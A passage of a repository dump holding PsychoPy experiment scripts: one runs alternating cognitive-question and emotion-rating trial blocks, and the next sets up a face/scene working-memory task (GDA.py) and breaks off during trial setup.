instructions5.setAutoDraw(True)\n \n # *key_resp_instr5* updates\n if t >= 0.0 and key_resp_instr5.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_instr5.tStart = t # underestimates by a little under one frame\n key_resp_instr5.frameNStart = frameN # exact frame index\n key_resp_instr5.status = STARTED\n # keyboard checking is just starting\n key_resp_instr5.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_instr5.status == STARTED:\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_instr5.keys = theseKeys[-1] # just the last key pressed\n key_resp_instr5.rt = key_resp_instr5.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in instr5Components:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n\n#-------Ending Routine \"instr5\"-------\nfor thisComponent in instr5Components:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n\n#------Prepare to start Routine \"instr6\"-------\nt = 0\ninstr6Clock.reset() # clock \nframeN = -1\n# update component parameters for each repeat\nkey_resp_instr6 = event.BuilderKeyResponse() # create an object of type KeyResponse\nkey_resp_instr6.status = NOT_STARTED\n# keep track of which components have finished\ninstr6Components = []\ninstr6Components.append(instructions6)\ninstr6Components.append(key_resp_instr6)\nfor thisComponent in instr6Components:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"instr6\"-------\ncontinueRoutine = True\nwhile continueRoutine:\n # get current time\n t = instr6Clock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *instructions6* updates\n if t >= 0.0 and instructions6.status == NOT_STARTED:\n # keep track of start time/frame for later\n instructions6.tStart = t # underestimates by a little under one frame\n instructions6.frameNStart = frameN # exact frame index\n instructions6.setAutoDraw(True)\n \n # *key_resp_instr6* updates\n if t >= 0.0 and key_resp_instr6.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_instr6.tStart = t # underestimates by a little under one frame\n key_resp_instr6.frameNStart = frameN # exact frame index\n key_resp_instr6.status = STARTED\n # keyboard checking is just starting\n key_resp_instr6.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_instr6.status == STARTED:\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_instr6.keys = theseKeys[-1] # just the last key pressed\n key_resp_instr6.rt = key_resp_instr6.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in instr6Components:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n\n#-------Ending Routine \"instr6\"-------\nfor thisComponent in instr6Components:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n\n# set up handler to look after randomisation of conditions etc\nblocks = data.TrialHandler(nReps=8, method=u'sequential', \n extraInfo=expInfo, originPath=None,\n trialList=[None],\n seed=None, name='blocks')\nthisExp.addLoop(blocks) # add the loop to the experiment\nthisBlock = blocks.trialList[0] # so we can initialise stimuli with some values\n# abbreviate parameter names if possible (e.g. rgb=thisBlock.rgb)\nif thisBlock != None:\n for paramName in thisBlock.keys():\n exec(paramName + '= thisBlock.' + paramName)\n\n#counterbalance = randint(1,9)\ncounterbalance=4\ncog_data=np.genfromtxt('conditions.txt',dtype=str,skip_header=1)\nshuffle(cog_data)\ncog_sorted=cog_data[np.argsort(cog_data[:,7])]\ncog_schedule = range(4)\nshuffle(cog_schedule)\n\nemo_data=np.genfromtxt('conditions.txt',dtype=str,skip_header=1)\nshuffle(emo_data)\nemo_sorted=emo_data[np.argsort(emo_data[:,7])]\nemo_schedule = range(4)\nshuffle(emo_schedule)\n\ncog_loop=0\nemo_loop=0\nfor thisBlock in blocks:\n currentLoop = blocks\n # abbreviate parameter names if possible (e.g. rgb = thisBlock.rgb)\n if thisBlock != None:\n for paramName in thisBlock.keys():\n exec(paramName + '= thisBlock.' + paramName)\n if counterbalance % 2 == 0:\n #------Prepare to start Routine \"cog_instr\"-------\n t = 0\n cog_instrClock.reset() # clock \n frameN = -1\n # update component parameters for each repeat\n key_resp_cog_instr = event.BuilderKeyResponse() # create an object of type KeyResponse\n key_resp_cog_instr.status = NOT_STARTED\n # keep track of which components have finished\n cog_instrComponents = []\n cog_instrComponents.append(cog_instructions)\n cog_instrComponents.append(key_resp_cog_instr)\n for thisComponent in cog_instrComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n \n #-------Start Routine \"cog_instr\"-------\n continueRoutine = True\n while continueRoutine:\n # get current time\n t = cog_instrClock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *cog_instructions* updates\n if t >= 0.0 and cog_instructions.status == NOT_STARTED:\n # keep track of start time/frame for later\n cog_instructions.tStart = t # underestimates by a little under one frame\n cog_instructions.frameNStart = frameN # exact frame index\n cog_instructions.setAutoDraw(True)\n \n # *key_resp_cog_instr* updates\n if t >= 0.0 and key_resp_cog_instr.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_cog_instr.tStart = t # underestimates by a little under one frame\n key_resp_cog_instr.frameNStart = frameN # exact frame index\n key_resp_cog_instr.status = STARTED\n # keyboard checking is just starting\n key_resp_cog_instr.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_cog_instr.status == STARTED:\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_cog_instr.keys = theseKeys[-1] # just the last key pressed\n key_resp_cog_instr.rt = key_resp_cog_instr.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in cog_instrComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n \n #-------Ending Routine \"cog_instr\"-------\n for thisComponent in cog_instrComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n # check responses\n if key_resp_cog_instr.keys in ['', [], None]: # No response was made\n key_resp_cog_instr.keys=None\n # store data for blocks (TrialHandler)\n blocks.addData('key_resp_cog_instr.keys',key_resp_cog_instr.keys)\n if key_resp_cog_instr.keys != None: # we had a response\n blocks.addData('key_resp_cog_instr.rt', key_resp_cog_instr.rt)\n \n # set up handler to look after randomisation of conditions etc\n cog_thisloop=cog_sorted[cog_schedule[cog_loop]*10:(cog_schedule[cog_loop]*10)+10]\n myarray=[]\n for i in range(len(cog_thisloop)):\n myarray.append({'stim1': cog_thisloop[i,0], 'choice1': cog_thisloop[i,1], 'choice2': cog_thisloop[i,2], 'choice3': cog_thisloop[i,3], 'choice4': cog_thisloop[i,4], 'corr': cog_thisloop[i,5], 'val': cog_thisloop[i,7]}) #puts data into an array of dictionaries that the TrialHandler function will accept\n cogs = data.TrialHandler(nReps=1, method=u'sequential', \n extraInfo=expInfo, originPath=None,\n trialList=myarray,\n seed=None, name='cogs')\n thisExp.addLoop(cogs) # add the loop to the experiment\n thisCog = cogs.trialList[0] # so we can initialise stimuli with some values\n # abbreviate parameter names if possible (e.g. rgb=thisCog.rgb)\n if thisCog != None:\n for paramName in thisCog.keys():\n exec(paramName + '= thisCog.' + paramName)\n \n for thisCog in cogs:\n currentLoop = cogs\n # abbreviate parameter names if possible (e.g. rgb = thisCog.rgb)\n if thisCog != None:\n for paramName in thisCog.keys():\n exec(paramName + '= thisCog.' + paramName)\n \n #------Prepare to start Routine \"cog\"-------\n t = 0\n cogClock.reset() # clock \n frameN = -1\n # update component parameters for each repeat\n cog_image.setImage(stim1)\n cog_choices.setText(u'1. %s 2. %s 3. %s 4. %s'%(choice1,choice2,choice3,choice4))\n key_resp_cog = event.BuilderKeyResponse() # create an object of type KeyResponse\n key_resp_cog.status = NOT_STARTED\n # keep track of which components have finished\n cogComponents = []\n cogComponents.append(cog_question)\n cogComponents.append(cog_image)\n cogComponents.append(cog_choices)\n cogComponents.append(key_resp_cog)\n for thisComponent in cogComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n \n #-------Start Routine \"cog\"-------\n continueRoutine = True\n while continueRoutine:\n # get current time\n t = cogClock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *cog_question* updates\n if t >= 0.0 and cog_question.status == NOT_STARTED:\n # keep track of start time/frame for later\n cog_question.tStart = t # underestimates by a little under one frame\n cog_question.frameNStart = frameN # exact frame index\n cog_question.setAutoDraw(True)\n \n # *cog_image* updates\n if t >= 0.0 and cog_image.status == NOT_STARTED:\n # keep track of start time/frame for later\n cog_image.tStart = t # underestimates by a little under one frame\n cog_image.frameNStart = frameN # exact frame index\n cog_image.setAutoDraw(True)\n \n # *cog_choices* updates\n if t >= 0.0 and cog_choices.status == NOT_STARTED:\n # keep track of start time/frame for later\n cog_choices.tStart = t # underestimates by a little under one frame\n cog_choices.frameNStart = frameN # exact frame index\n cog_choices.setAutoDraw(True)\n \n # *key_resp_cog* updates\n if t >= 0.0 and key_resp_cog.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_cog.tStart = t # underestimates by a little under one frame\n key_resp_cog.frameNStart = frameN # exact frame index\n key_resp_cog.status = STARTED\n # keyboard checking is just starting\n key_resp_cog.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_cog.status == STARTED:\n theseKeys = event.getKeys(keyList=['1', '2', '3', '4'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_cog.keys = theseKeys[-1] # just the last key pressed\n key_resp_cog.rt = key_resp_cog.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in cogComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n \n #-------Ending Routine \"cog\"-------\n for thisComponent in cogComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n # check responses\n if key_resp_cog.keys in ['', [], None]: # No response was made\n key_resp_cog.keys=None\n # store data for cogs (TrialHandler)\n cogs.addData('key_resp_cog.keys',key_resp_cog.keys)\n if key_resp_cog.keys != None: # we had a response\n cogs.addData('key_resp_cog.rt', key_resp_cog.rt)\n thisExp.nextEntry()\n \n # completed 1 repeats of 'cogs'\n if key_resp_cog.keys==corr:\n acc=1\n else:\n acc=0\n datFile.write('%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n'%(blocks.thisN+1,cogs.thisN+1,stim1,'cog',val,key_resp_cog.keys,key_resp_cog.rt,acc))\n cog_loop = cog_loop + 1\n elif counterbalance % 2 != 0:\n #------Prepare to start Routine \"emo_instr\"-------\n t = 0\n emo_instrClock.reset() # clock \n frameN = -1\n # update component parameters for each repeat\n key_resp_emo_instr = event.BuilderKeyResponse() # create an object of type KeyResponse\n key_resp_emo_instr.status = NOT_STARTED\n # keep track of which components have finished\n emo_instrComponents = []\n emo_instrComponents.append(emo_instructions)\n emo_instrComponents.append(key_resp_emo_instr)\n for thisComponent in emo_instrComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n \n #-------Start Routine \"emo_instr\"-------\n continueRoutine = True\n while continueRoutine:\n # get current time\n t = emo_instrClock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *emo_instructions* updates\n if t >= 0.0 and emo_instructions.status == NOT_STARTED:\n # keep track of start time/frame for later\n emo_instructions.tStart = t # underestimates by a little under one frame\n emo_instructions.frameNStart = frameN # exact frame index\n emo_instructions.setAutoDraw(True)\n \n # *key_resp_emo_instr* updates\n if t >= 0.0 and key_resp_emo_instr.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_emo_instr.tStart = t # underestimates by a little under one frame\n key_resp_emo_instr.frameNStart = frameN # exact frame index\n key_resp_emo_instr.status = STARTED\n # keyboard checking is just starting\n key_resp_emo_instr.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_emo_instr.status == STARTED:\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_emo_instr.keys = theseKeys[-1] # just the last key pressed\n key_resp_emo_instr.rt = key_resp_emo_instr.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in emo_instrComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n \n #-------Ending Routine \"emo_instr\"-------\n for thisComponent in emo_instrComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n # check responses\n if key_resp_emo_instr.keys in ['', [], None]: # No response was made\n key_resp_emo_instr.keys=None\n # store data for blocks (TrialHandler)\n blocks.addData('key_resp_emo_instr.keys',key_resp_emo_instr.keys)\n if key_resp_emo_instr.keys != None: # we had a response\n blocks.addData('key_resp_emo_instr.rt', key_resp_emo_instr.rt)\n \n # set up handler to look after randomisation of conditions etc\n emo_thisloop=emo_sorted[emo_schedule[emo_loop]*10:(emo_schedule[emo_loop]*10)+10]\n myarray2=[]\n for i in range(len(emo_thisloop)):\n myarray2.append({'stim2': emo_thisloop[i,0], 'val': emo_thisloop[i,7]})\n emos = data.TrialHandler(nReps=1, method=u'sequential', \n extraInfo=expInfo, originPath=None,\n trialList=myarray2,\n seed=None, name='emos')\n thisExp.addLoop(emos) # add the loop to the experiment\n thisEmo = emos.trialList[0] # so we can initialise stimuli with some values\n # abbreviate parameter names if possible (e.g. rgb=thisEmo.rgb)\n if thisEmo != None:\n for paramName in thisEmo.keys():\n exec(paramName + '= thisEmo.' + paramName)\n \n for thisEmo in emos:\n currentLoop = emos\n # abbreviate parameter names if possible (e.g. rgb = thisEmo.rgb)\n if thisEmo != None:\n for paramName in thisEmo.keys():\n exec(paramName + '= thisEmo.' + paramName)\n \n #------Prepare to start Routine \"emo\"-------\n t = 0\n emoClock.reset() # clock \n frameN = -1\n # update component parameters for each repeat\n emo_image.setImage(stim2)\n key_resp_emo = event.BuilderKeyResponse() # create an object of type KeyResponse\n key_resp_emo.status = NOT_STARTED\n # keep track of which components have finished\n emoComponents = []\n emoComponents.append(emo_question)\n emoComponents.append(emo_image)\n emoComponents.append(emo_choices)\n emoComponents.append(key_resp_emo)\n emoComponents.append(emo_explanation)\n for thisComponent in emoComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n \n #-------Start Routine \"emo\"-------\n continueRoutine = True\n while continueRoutine:\n # get current time\n t = emoClock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *emo_question* updates\n if t >= 0.0 and emo_question.status == NOT_STARTED:\n # keep track of start time/frame for later\n emo_question.tStart = t # underestimates by a little under one frame\n emo_question.frameNStart = frameN # exact frame index\n emo_question.setAutoDraw(True)\n \n # *emo_image* updates\n if t >= 0.0 and emo_image.status == NOT_STARTED:\n # keep track of start time/frame for later\n emo_image.tStart = t # underestimates by a little under one frame\n emo_image.frameNStart = frameN # exact frame index\n emo_image.setAutoDraw(True)\n \n # *emo_choices* updates\n if t >= 0.0 and emo_choices.status == NOT_STARTED:\n # keep track of start time/frame for later\n emo_choices.tStart = t # underestimates by a little under one frame\n emo_choices.frameNStart = frameN # exact frame index\n emo_choices.setAutoDraw(True)\n \n # *key_resp_emo* updates\n if t >= 0.0 and key_resp_emo.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_emo.tStart = t # underestimates by a little under one frame\n key_resp_emo.frameNStart = frameN # exact frame index\n key_resp_emo.status = STARTED\n # keyboard checking is just starting\n key_resp_emo.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_emo.status == STARTED:\n theseKeys = event.getKeys(keyList=['1', '2', '3', '4', '5', '6', '7', '8', '9'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_emo.keys = theseKeys[-1] # just the last key pressed\n key_resp_emo.rt = key_resp_emo.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # *emo_explanation* updates\n if t >= 0.0 and emo_explanation.status == NOT_STARTED:\n # keep track of start time/frame for later\n emo_explanation.tStart = t # underestimates by a little under one frame\n emo_explanation.frameNStart = frameN # exact frame index\n emo_explanation.setAutoDraw(True)\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in emoComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n \n #-------Ending Routine \"emo\"-------\n for thisComponent in emoComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n # check responses\n if key_resp_emo.keys in ['', [], None]: # No response was made\n key_resp_emo.keys=None\n # store data for emos (TrialHandler)\n emos.addData('key_resp_emo.keys',key_resp_emo.keys)\n if key_resp_emo.keys != None: # we had a response\n emos.addData('key_resp_emo.rt', key_resp_emo.rt)\n thisExp.nextEntry()\n \n # completed 1 repeats of 'emos'\n datFile.write('%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n'%(blocks.thisN+1,emos.thisN+1,stim2,'emo',val,key_resp_emo.keys,key_resp_emo.rt,'N/A'))\n emo_loop = emo_loop + 1\n \n thisExp.nextEntry()\n counterbalance = counterbalance + 1\n# completed 4 repeats of 'blocks'\n\nwin.close()\ncore.quit()\n"
},
{
"alpha_fraction": 0.6176777482032776,
"alphanum_fraction": 0.6442216038703918,
"avg_line_length": 39.438533782958984,
"blob_id": "94dd878afb37e94b276cb3d06a009a333a01fbf4",
"content_id": "610139f17438ec8b197c8d1ebd4c5130b0015521",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22039,
"license_type": "no_license",
"max_line_length": 262,
"num_lines": 545,
"path": "/GDA.py",
"repo_name": "maheen/gablab-psychopy-tasks",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nThis experiment was created using PsychoPy2 Experiment Builder (v1.74.00), Thu Nov 29 13:31:35 2012\nIf you publish work using this script please cite the relevant PsychoPy publications\n Peirce, JW (2007) PsychoPy - Psychophysics software in Python. Journal of Neuroscience Methods, 162(1-2), 8-13.\n Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy. Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008\n\"\"\"\n\nfrom __future__ import division #so that 1/3=0.333 instead of 1/3=0\nfrom psychopy import visual, core, data, event, logging, gui\nfrom psychopy.constants import * #things like STARTED, FINISHED\nimport numpy as np # whole numpy lib is available, prepend 'np.'\nfrom numpy import sin, cos, tan, log, log10, pi, average, sqrt, std, deg2rad, rad2deg, linspace, asarray\nfrom numpy.random import random, randint, normal, shuffle, seed\nimport os #handy system and path functions\n\n#store info about the experiment session\nexpName='GDA_skeleton'#from the Builder filename that created this script\nexpInfo={'participant':'', 'session':'001'}\ndlg=gui.DlgFromDict(dictionary=expInfo,title=expName)\nif dlg.OK==False: core.quit() #user pressed cancel\nexpInfo['date']=data.getDateStr()#add a simple timestamp\nexpInfo['expName']=expName\n#setup files for saving\nif not os.path.isdir('data'):\n os.makedirs('data') #if this fails (e.g. permissions) we will get error\nfilename='data' + os.path.sep + '%s_GDA_%s' %(expInfo['participant'], expInfo['date'])\nlogFile=logging.LogFile(filename+'.log', level=logging.EXP)\nlogging.console.setLevel(logging.WARNING)#this outputs to the screen, not a file\n\n#an ExperimentHandler isn't essential but helps with data saving\nthisExp = data.ExperimentHandler(name=expName, version='',\n extraInfo=expInfo, runtimeInfo=None,\n originPath=None,\n savePickle=True, saveWideText=True,\n dataFileName=filename)\ndatFile=open('data' + os.path.sep + '%s_GDA_%s.txt' %(expInfo['participant'], expInfo['date']),'a')\ndatFile.write('Trial\\tFace1\\tScene1\\tFace2\\tScene2\\tProbe\\tTrialType\\tResponse\\tTargets\\tHits\\tMisses\\tFAs\\tRT\\n')\n\n#setup the Window\nwin = visual.Window(size=(1920, 1080), fullscr=True, screen=0, allowGUI=False, allowStencil=False,\n monitor='testMonitor', color='white', colorSpace='rgb')\n\n#Info about experiment length and counterbalancing\nrunLength=5\ncounterbalance=np.asarray((['f']+['s']+['b']+['p'])*3)\nseed(int(expInfo['participant'])+18)\nshuffle(counterbalance)\nprint 'counterbalance=%s'%(counterbalance)\nrunNum=len(counterbalance)\ntotTrialNum=runNum*runLength\n\n#Initialise components for Routine \"instr\"\ninstrClock=core.Clock()\ninstructions=visual.TextStim(win=win, ori=0, name='instructions',\n text='Press ENTER to begin.',\n font='Arial',\n pos=[0, 0], height=0.1,wrapWidth=None,\n color='black', colorSpace='rgb', opacity=1,\n depth=0.0)\n\n#Initialise components for other instructions\ninstr_f=visual.TextStim(win=win, ori=0, name='instructions',\n text='Remember faces, ignore scenes',\n font='Arial',\n pos=[0, 0], height=0.1,wrapWidth=None,\n color='black', colorSpace='rgb', opacity=1,\n depth=0.0)\ninstr_s=visual.TextStim(win=win, ori=0, name='instructions',\n text='Remember scenes, ignore faces',\n font='Arial',\n pos=[0, 0], height=0.1,wrapWidth=None,\n color='black', colorSpace='rgb', opacity=1,\n depth=0.0)\ninstr_b=visual.TextStim(win=win, ori=0, name='instructions',\n text='Remember both faces and scenes',\n font='Arial',\n pos=[0, 0], height=0.1,wrapWidth=None,\n color='black', colorSpace='rgb', opacity=1,\n depth=0.0)\ninstr_p=visual.TextStim(win=win, ori=0, name='instructions',\n text='Passive view',\n font='Arial',\n pos=[0, 0], height=0.1,wrapWidth=None,\n color='black', colorSpace='rgb', opacity=1,\n depth=0.0)\n\n#Initialise components for Routine \"trial\"\ntrialClock=core.Clock()\nimage1=visual.ImageStim(win=win, name='image1',units='pix', \n image='sin', mask=None,\n ori=0, pos=[0, 0], size=[225, 338],\n color=[1,1,1], colorSpace='rgb', opacity=1,\n texRes=128, interpolate=True, depth=0.0)\nimage2=visual.ImageStim(win=win, name='image2',units='pix', \n image='sin', mask=None,\n ori=0, pos=[0, 0], size=[225, 338],\n color=[1,1,1], colorSpace='rgb', opacity=1,\n texRes=128, interpolate=True, depth=-1.0)\nimage3=visual.ImageStim(win=win, name='image3',units='pix', \n image='sin', mask=None,\n ori=0, pos=[0, 0], size=[225, 338],\n color=[1,1,1], colorSpace='rgb', opacity=1,\n texRes=128, interpolate=True, depth=-2.0)\nimage4=visual.ImageStim(win=win, name='image4',units='pix', \n image='sin', mask=None,\n ori=0, pos=[0, 0], size=[225, 338],\n color=[1,1,1], colorSpace='rgb', opacity=1,\n texRes=128, interpolate=True, depth=-3.0)\ndelay=visual.TextStim(win=win, ori=0, name='delay',\n text='+',\n font='Arial',\n pos=[0, 0], height=0.2,wrapWidth=None,\n color='black', colorSpace='rgb', opacity=1,\n depth=-4.0)\nimage5=visual.ImageStim(win=win, name='image5',units='pix', \n image='sin', mask=None,\n ori=0, pos=[0, 0], size=[225, 338],\n color=[1,1,1], colorSpace='rgb', opacity=1,\n texRes=128, interpolate=True, depth=-5.0)\nITI=visual.TextStim(win=win, ori=0, name='ITI',\n text='+',\n font='Arial',\n pos=[0, 0], height=0.2,wrapWidth=None,\n color='black', colorSpace='rgb', opacity=1,\n depth=-6.0)\n\n# Create some handy timers\nglobalClock=core.Clock() #to track the time since experiment started\n#routineTimer=core.CountdownTimer() #to track time remaining of each (non-slip) routine \n\n#------Prepare to start Routine\"instr\"-------\nt=0; instrClock.reset() #clock \nframeN=-1\n#update component parameters for each repeat\ninstr_resp = event.BuilderKeyResponse() #create an object of type KeyResponse\ninstr_resp.status=NOT_STARTED\n#keep track of which components have finished\ninstrComponents=[]\ninstrComponents.append(instructions)\ninstrComponents.append(instr_resp)\nfor thisComponent in instrComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n#-------Start Routine \"instr\"-------\ncontinueRoutine=True\nwhile continueRoutine:\n #get current time\n t=instrClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*instructions* updates\n if t>=0.0 and instructions.status==NOT_STARTED:\n #keep track of start time/frame for later\n instructions.tStart=t#underestimates by a little under one frame\n instructions.frameNStart=frameN#exact frame index\n instructions.setAutoDraw(True)\n \n #*instr_resp* updates\n if t>=0.0 and instr_resp.status==NOT_STARTED:\n #keep track of start time/frame for later\n instr_resp.tStart=t#underestimates by a little under one frame\n instr_resp.frameNStart=frameN#exact frame index\n instr_resp.status=STARTED\n #keyboard checking is just starting\n instr_resp.clock.reset() # now t=0\n event.clearEvents()\n if instr_resp.status==STARTED:#only update if being drawn\n theseKeys = event.getKeys(keyList=['return', '+'])\n if len(theseKeys)>0:#at least one key was pressed\n instr_resp.keys=theseKeys[-1]#just the last key pressed\n instr_resp.rt = instr_resp.clock.getTime()\n #abort routine on response\n continueRoutine=False\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n# routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in instrComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n\n#End of Routine \"instr\"\nfor thisComponent in instrComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n\n#set up handler to look after randomisation of conditions etc\nvarLists=np.loadtxt('conditions.txt',dtype='str',delimiter='\\t') #loads info from conditions file (which should be a .txt not an .xlsx)\nfemFaces=varLists[0:90,0]\nmalFaces=varLists[90:180,0]\nsceneList=varLists[:,1]\narrows=varLists[:,2]\nseed(int(expInfo['participant'])+65) #seeds randomization based on participant number\nshuffle(femFaces) #shuffles/randomizes list based on above seed\nseed(int(expInfo['participant'])+47) #seeds randomization based on participant number\nshuffle(malFaces) #shuffles/randomizes list based on above seed\nseed(int(expInfo['participant'])+94) #seeds randomization based on participant number\nshuffle(sceneList) #shuffles/randomizes list based on above seed\nmale1=malFaces[0:totTrialNum/2]\nmale2=malFaces[totTrialNum/2:totTrialNum]\nmale_rest=malFaces[totTrialNum:len(malFaces)]\nfemale1=femFaces[0:totTrialNum/2]\nfemale2=femFaces[totTrialNum/2:totTrialNum]\nfemale_rest=femFaces[totTrialNum:len(femFaces)]\nsceneList1=sceneList[0:totTrialNum]\nsceneList2=sceneList[totTrialNum:totTrialNum*2]\nscenes_rest=sceneList[totTrialNum*2:len(sceneList)]\norder=[]\nfor i in range(len(counterbalance)):\n if counterbalance[i]=='p':\n order.extend([0]*runLength)\n else:\n this_order=[0]*int(runLength*0.8)+[1]*int(runLength*0.2)\n seed(int(expInfo['participant'])+93+i)\n shuffle(this_order)\n order.extend(this_order)\nfaceList1=[]\nfaceList2=[]\ntarget=[]\ntrialType=[]\nfor i in range(totTrialNum):\n rangemat=(range(0,runNum*runLength,runLength))+(range(runLength,(runNum+1)*runLength,runLength))\n rangemat=np.sort(rangemat)\n 